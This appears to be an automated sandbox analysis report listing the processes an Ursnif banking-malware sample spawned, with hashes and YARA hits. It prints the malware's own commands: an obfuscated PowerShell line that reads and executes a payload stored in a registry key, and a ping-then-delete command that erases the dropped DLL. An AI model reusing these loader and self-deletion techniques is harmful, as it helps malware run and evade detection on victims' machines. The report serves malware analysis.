                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                  Imagebase:0x7ff6ba650000
                                  File size:447488 bytes
                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  Target ID:27
                                  Start time:11:18:09
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff647620000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:28
                                  Start time:11:18:19
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                                  Imagebase:0x7ff792450000
                                  File size:2739304 bytes
                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Target ID:29
                                  Start time:11:18:21
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                                  Imagebase:0x7ff607f30000
                                  File size:47280 bytes
                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:31
                                  Start time:11:18:24
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                                  Imagebase:0x7ff792450000
                                  File size:2739304 bytes
                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  Target ID:32
                                  Start time:11:18:26
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                                  Imagebase:0x7ff607f30000
                                  File size:47280 bytes
                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:33
                                  Start time:11:18:27
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\control.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\control.exe -h
                                  Imagebase:0x7ff78e810000
                                  File size:117760 bytes
                                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                  Target ID:35
                                  Start time:11:18:36
                                  Start date:25/05/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff6f3b00000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:42
                                  Start time:11:18:56
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                                  Imagebase:0x7ff7bb450000
                                  File size:273920 bytes
                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:43
                                  Start time:11:18:57
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff647620000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:44
                                  Start time:11:18:58
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping localhost -n 5
                                  Imagebase:0x7ff6219d0000
                                  File size:21504 bytes
                                  MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  No disassembly